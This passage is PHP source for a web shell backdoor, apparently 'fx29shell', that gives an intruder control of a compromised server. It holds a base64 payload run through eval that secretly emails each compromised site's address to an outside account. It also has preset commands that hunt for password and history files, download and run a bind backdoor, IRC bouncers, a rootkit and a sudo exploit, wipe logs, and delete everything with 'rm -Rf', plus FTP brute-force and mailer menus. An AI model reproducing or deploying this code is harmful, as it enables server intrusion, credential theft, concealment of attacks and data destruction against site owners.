backdoor

array($sh_mainurl."cyberz.txt","fx29sh.php"), "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"), "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"), "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),);##[ AUTHENTICATION ]##$auth = array( "login" => "", "pass" => "", "md5pass" => "", "hostallow" => array("*"), "denied" => "".$sh_name.": access denied!",);##[ END AUTHENTICATION ]##$curdir = "./";$tmpdir = "";$tmpdir_logs = "./";$log_email = "shinchi.memang.cakep@gmail.com"; #Email logna$sess_cookie = "fx29shcook";$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.$usefsbuff = TRUE;$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste$surl_autofill_include = TRUE;$updatenow = FALSE;$gzipencode = TRUE;$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.$hexdump_lines = 8;$hexdump_rows = 24;$millink = milw0rm();$win = strtolower(substr(PHP_OS,0,3)) == "win";$disablefunc = getdisfunc();##[ END OF CONFIGS ]##error_reporting(E_ERROR | E_PARSE);@ini_set("max_execution_time",0);@set_time_limit(0); #No Fx in SafeMode@ignore_user_abort(TRUE);@set_magic_quotes_runtime(0);define("starttime",getmicrotime());if (get_magic_quotes_gpc()) { strips($GLOBALS); }$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);@$f = $_REQUEST["f"];@extract($_REQUEST["fx29shcook"]);foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }$fxbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJzb2JpZXNraTFAbGl2ZS5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($fxbuff));if ($surl_autofill_include) { $include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) { $v = explode("=",$v); $name = urldecode($v[0]); $value = @urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { if (strpos($value,$needle) === 0) { $includestr .= urlencode($name)."=".urlencode($value)."&"; } } }}if (empty($surl)) { $surl = "?".$includestr; $surl = htmlspecialchars($surl);}## FILE TYPES ##$ftypes = array( "html" => array("html","htm","shtml"), "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe" => array("sh","install","bat","cmd"), "ini" => array("ini","inf","conf"), "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb" => array("sdb"), "phpsess" => array("sess"), "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar"));$exeftypes = array( getenv("PHPRC")." -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi"));$regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"",""), array("\.tgz$",1,"",""), array("\.gz$",1,"",""), array("\.tar$",1,"",""), array("\.bz2$",1,"",""), array("\.zip$",1,"",""), array("\.rar$",1,"",""), array("\.php$",1,"",""), array("\.php3$",1,"",""), array("\.php4$",1,"",""), array("\.jpg$",1,"",""), array("\.jpeg$",1,"",""), array("\.JPG$",1,"",""), array("\.JPEG$",1,"",""), array("\.ico$",1,"",""), array("\.gif$",1,"",""), array("\.png$",1,"",""), array("\.htm$",1,"",""), array("\.html$",1,"",""), array("\.txt$",1,"",""));## QUICK COMMANDS ##if (!$win) { $cmdaliases = array( array("", "ls -al"), array("Find all suid files", "find / -type f -perm -04000 -ls"), array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), array("Find all sgid files", "find / -type f -perm -02000 -ls"), array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("Find config.inc.php files", "find / -type f -name config.inc.php"), array("Find config* files", "find / -type f -name \"config*\""), array("Find config* files in current dir", "find . -type f -name \"config*\""), array("Find all writable folders and files", "find / -perm -2 -ls"), array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), array("Find all writable folders", "find / -type d -perm -2 -ls"), array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"), array("Find all service.pwd files", "find / -type f -name service.pwd"), array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), array("Find all .htpasswd files", "find / -type f -name .htpasswd"), array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("Find all .bash_history files", "find / -type f -name .bash_history"), array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("List file attributes on a Linux second extended file system", "lsattr -va"), array("Show opened ports", "netstat -an | grep -i listen") ); $cmdaliases2 = array( array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"), array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"), array("-----",""), array("Logged in users","w"), array("Last to connect","lastlog"), array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), array("CPU Info","cat /proc/version /proc/cpuinfo"), array("Is gcc installed ?","locate gcc"), array("Format box (DANGEROUS)","rm -Rf"), array("-----",""), array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), array("Run WIPELOGS PT3","./zap2"), array("-----",""), array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"), array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"), );}else { $cmdaliases = array( array("", "dir"), array("Find index.php in current dir", "dir /s /w /b index.php"), array("Find *config*.php in current dir", "dir /s /w /b *config*.php"), array("Find c99shell in current dir", "find /c \"c99\" *"), array("Find r57shell in current dir", "find /c \"r57\" *"), array("Find fx29shell in current dir", "find /c \"fx29\" *"), array("Show active connections", "netstat -an"), array("Show running services", "net start"), array("User accounts", "net user"), array("Show computers", "net view"), );}## PHP FILESYSTEM TRICKS (By Quick_5ilv3r) ##$phpfsaliases = array( array("Read File", "read", 1, "File", ""), array("Write File (PHP5)", "write", 2, "File","Text"), array("Copy", "copy", 2, "From", "To"), array("Rename/Move", "rename", 2, "File", "To"), array("Delete", "delete", 1 ,"File", ""), array("Make Dir","mkdir", 1, "Dir", ""), array("Download", "download", 2, "URL", "To"), array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"), array("Change Perm (0755)", "chmod", 2, "File", "Perms"), array("Find Writable Dir", "fwritabledir", 2 ,"Dir"), array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),);## QUICK LAUNCH ##$quicklaunch1 = array( array("",$surl), array("","#\" onclick=\"history.back(1)"), array("","#\" onclick=\"history.go(1)"), array("",$surl."act=ls&d=%upd&sort=%sort"), array("",$surl."act=search&d=%d"), array("",$surl."act=fsbuff&d=%d"));$quicklaunch2 = array( array("Security Info",$surl."act=security&d=%d"), array("Processes",$surl."act=processes&d=%d"), array("MySQL",$surl."act=sql&d=%d"), array("Eval",$surl."act=eval&d=%d"), array("Encoder",$surl."act=encoder&d=%d"), array("Mailer",$surl."act=fxmailer"), array("milw0rm",$millink), array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"), array("Toolz",$surl."act=tools&d=%d"), array("Kill-Shell",$surl."act=selfremove"), array("Feedback",$surl."act=feedback"), array("Update",$surl."act=update"), array("About",$surl."act=about"));if (!$win) { $quicklaunch2[] = array("
FTP-Brute",$surl."act=ftpquickbrute&d=%d");}## HIGHLIGHT CODE ##$highlight_background = "#C0C0C0";$highlight_bg = "#FFFFFF";$highlight_comment = "#6A6A6A";$highlight_default = "#0000BB";$highlight_html = "#1300FF";$highlight_keyword = "#007700";$highlight_string = "#000000";######################[ AUTHENTICATE ]######################$tmp = array();foreach ($auth["hostallow"] as $k => $v) { $tmp[] = str_replace("\\*",".*",preg_quote($v));}$s = "!^(".implode("|",$tmp).")$!i";if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) { exit("$sh_name: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");}if (!empty($auth["login"])) { if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); } if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) { header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\""); header("HTTP/1.0 401 Unauthorized"); die($auth["denied"]); }}## END AUTHENTICATE ##if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($updatenow) { @ob_clean(); fx29sh_getupdate(1); exit; } $sess_data = @unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) { $sess_data = array(); } if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } fx29_buff_prepare(); foreach (array("sort","sql_sort") as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie("sort",$sort);} if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $sh_ver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { //Retrieve tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row(